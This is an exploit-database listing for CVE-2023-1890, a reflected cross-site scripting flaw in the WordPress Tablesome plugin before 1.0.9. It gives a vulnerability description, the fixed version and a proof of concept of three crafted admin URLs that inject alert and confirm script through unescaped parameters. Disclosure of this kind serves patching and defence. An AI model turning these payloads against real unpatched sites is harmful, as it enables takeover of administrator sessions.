Share
## https://sploitus.com/exploit?id=PACKETSTORM:173727
Tittle:  
WordPress Plugin Tablesome < 1.0.9 - Reflected XSS  
  
References:  
CVE-2023-1890  
  
Author:  
Taurus Omar   
  
Description:  
The plugin does not escape various generated URLs, before outputting them in attributes when some notices are displayed, leading to Reflected Cross-Site Scripting  
  
Affects Plugins:  
Tablesome - Fixed in version 1.0.9  
  
Proof of Concept:  
Make a logged in admin open one of the URL below when the feature/tracking notice has not been dismissed yet  
  
https://example.com/wp-admin/edit.php?post_type=tablesome_cpt&a%22%3E%27%3E%3Cdetails%2Fopen%2Fontoggle%3Dconfirm%28%27XSS%27%29%3E  
https://example.com/wp-admin/edit.php?post_type=tablesome_cpt&tablesome_feature_notice_dismissed=1&</script><script>alert(/XSS/)</script>  
https://example.com/wp-admin/edit.php?post_type=tablesome_cpt&can_track_tablesome_events=1&</script><script>alert(/XSS/)</script>   
  
Classification:  
Type XSS   
OWASP top 10 A7: Cross-Site Scripting (XSS)  
CWE-79  
  
wpScan:  
https://wpscan.com/vulnerability/8ef64490-30cd-4e07-9b7c-64f551944f3d